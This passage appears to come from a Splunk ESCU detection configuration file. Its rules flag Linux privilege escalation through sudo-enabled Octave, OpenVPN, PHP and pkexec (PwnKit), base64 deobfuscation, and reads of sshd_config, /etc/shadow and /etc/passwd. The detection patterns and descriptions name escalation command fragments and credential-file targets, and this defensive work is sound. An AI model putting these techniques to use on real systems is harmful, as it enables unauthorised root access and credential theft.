disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*NOPASSWD:*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_nopasswd_entry_in_sudoers_file_filter` [ESCU - Linux Obfuscated Files or Information Base64 Decode - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of base64 decode on Linux being utilized to deobfuscate a file. Identify the source of the file and determine if legitimate. Review parallel processes for further behavior before and after. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of base64 decode on Linux being utilized to deobfuscate a file. Identify the source of the file and determine if legitimate. Review parallel processes for further behavior before and after. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. 
The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and will require some tuning based on processes. Filter as needed. action.escu.creation_date = 2022-07-27 action.escu.modification_date = 2022-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Obfuscated Files or Information Base64 Decode - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ decoding base64. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Obfuscated Files or Information Base64 Decode - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*base64 -d*","*base64 --decode*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_obfuscated_files_or_information_base64_decode_filter` [ESCU - Linux Octave Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = GNU Octave is a high-level programming language primarily intended for scientific computing and numerical computation. Octave helps in solving linear and nonlinear problems numerically, and for performing other numerical experiments using a language that is mostly compatible with MATLAB. 
If sudo right is given to the application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = GNU Octave is a high-level programming language primarily intended for scientific computing and numerical computation. Octave helps in solving linear and nonlinear problems numerically, and for performing other numerical experiments using a language that is mostly compatible with MATLAB. If sudo right is given to the application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. 
action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Octave Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Octave Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*octave-cli*" AND Processes.process="*--eval*" AND Processes.process="*system*" AND Processes.process="*sudo*" 
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_octave_privilege_escalation_filter` [ESCU - Linux OpenVPN Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It implements both client and server applications. If sudo right is given to the OpenVPN application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It implements both client and server applications. If sudo right is given to the OpenVPN application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. 
The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux OpenVPN Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux OpenVPN Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 
is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*openvpn*" AND Processes.process="*--dev*" AND Processes.process="*--script-security*" AND Processes.process="*--up*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_openvpn_privilege_escalation_filter` [ESCU - Linux Persistence and Privilege Escalation Risk Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = The following correlation is specific to Linux persistence and privilege escalation tactics and is tied to two analytic stories and any Linux analytic tied to persistence and privilege escalation. These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following correlation is specific to Linux persistence and privilege escalation tactics and is tied to two analytic stories and any Linux analytic tied to persistence and privilege escalation. These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. action.escu.how_to_implement = Ensure Linux anomaly and TTP analytics are enabled. TTP may be set to Notables for point detections, anomaly should not be notables but risk generators. The correlation relies on more than x amount of distict detection names generated before generating a notable. Modify the value as needed. Default value is set to 4. 
This value may need to be increased based on activity in your environment. action.escu.known_false_positives = False positives will be present based on many factors. Tune the correlation as needed to reduce too many triggers. action.escu.creation_date = 2022-08-30 action.escu.modification_date = 2022-08-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Persistence and Privilege Escalation Risk Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Linux Persistence and Privilege Escalation Risk Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following correlation is specific to Linux persistence and privilege escalation tactics and is tied to two analytic stories and any Linux analytic tied to persistence and privilege escalation. These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. 
action.notable.param.rule_title = RBA: Linux Persistence and Privilege Escalation Risk Behavior action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where (All_Risk.analyticstories IN ("Linux Privilege Escalation", "Linux Persistence Techniques") OR source = "*Linux*") All_Risk.annotations.mitre_attack.mitre_tactic IN ("persistence", "privilege-escalation") All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `linux_persistence_and_privilege_escalation_risk_behavior_filter` [ESCU - Linux PHP Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = PHP is a general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1994. The PHP reference implementation is now produced by The PHP Group. 
If sudo right is given to php application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = PHP is a general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1994. The PHP reference implementation is now produced by The PHP Group. If sudo right is given to php application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. 
action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux PHP Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux PHP Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*php*-r*" AND Processes.process="*system*" AND Processes.process="*sudo*" by Processes.dest Processes.user 
Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_php_privilege_escalation_filter` [ESCU - Linux pkexec Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `pkexec` spawning with no command-line arguments. CVE-2021-4034 (PwnKit), a vulnerability in Polkit's pkexec component, is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `pkexec` spawning with no command-line arguments. CVE-2021-4034 (PwnKit), a vulnerability in Polkit's pkexec component, is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-01-28 action.escu.modification_date = 2022-01-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux pkexec Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ related to a local privilege escalation in polkit pkexec. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux pkexec Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-4034"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `pkexec` spawning with no command-line arguments. 
CVE-2021-4034 (PwnKit), a vulnerability in Polkit's pkexec component, is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system. action.notable.param.rule_title = Linux pkexec Privilege Escalation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=pkexec by _time Processes.dest Processes.user Processes.process_id Processes.parent_process_name Processes.process_name Processes.process Processes.process_path | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(^.{1}$)" | `linux_pkexec_privilege_escalation_filter` [ESCU - Linux Possible Access Or Modification Of sshd Config File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious process command lines that may access or modify sshd_config. This is the SSH daemon configuration file, which threat actors may modify to change the listening port or to allow logins with an authorized key generated during the attack. This anomaly detection may also catch administrators auditing or modifying the SSH configuration, in which case a filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious process command lines that may access or modify sshd_config.
This is the SSH daemon configuration file, which threat actors may modify to change the listening port or to allow logins with an authorized key generated during the attack. This anomaly detection may also catch administrators auditing or modifying the SSH configuration, in which case a filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or network operators may use this command line for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2022-01-11 action.escu.modification_date = 2022-01-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Access Or Modification Of sshd Config File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Access Or Modification Of sshd Config File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("cat", "nano*","vim*", "vi*") AND Processes.process IN("*/etc/ssh/sshd_config") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id 
Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_access_or_modification_of_sshd_config_file_filter` [ESCU - Linux Possible Access To Credential Files - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects a possible attempt to dump or read the contents of /etc/passwd and /etc/shadow to enable offline credential cracking. /etc/passwd stores user account information on Linux, while /etc/shadow contains the users' password hashes. Adversaries may read these files to gain persistence and/or escalate privileges. This anomaly detection can be a good indicator of a credential dumping technique, but it may also catch normal administrator automation scripts or credential auditing, in which case a filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.008", "T1003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects a possible attempt to dump or read the contents of /etc/passwd and /etc/shadow to enable offline credential cracking. /etc/passwd stores user account information on Linux, while /etc/shadow contains the users' password hashes. Adversaries may read these files to gain persistence and/or escalate privileges. This anomaly detection can be a good indicator of a credential dumping technique, but it may also catch normal administrator automation scripts or credential auditing, in which case a filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed.
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or network operators may run this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-10 action.escu.modification_date = 2022-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Access To Credential Files - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A command line $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Access To Credential Files - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.008", "T1003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode
= 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("cat", "nano*","vim*", "vi*") AND Processes.process IN("*/etc/shadow*", "*/etc/passwd*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_access_to_credential_files_filter` [ESCU - Linux Possible Access To Sudoers File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects possible access to or modification of the /etc/sudoers file. /etc/sudoers controls who can run which commands as which users on which machines, and whether a specific user needs a password for particular commands. Adversaries abuse this file to gain persistence and/or escalate privileges on a targeted host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects possible access to or modification of the /etc/sudoers file. /etc/sudoers controls who can run which commands as which users on which machines, and whether a specific user needs a password for particular commands. Adversaries abuse this file to gain persistence and/or escalate privileges on a targeted host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents.
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or network operators may run this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-10 action.escu.modification_date = 2022-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Access To Sudoers File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A command line $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Access To Sudoers File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases":
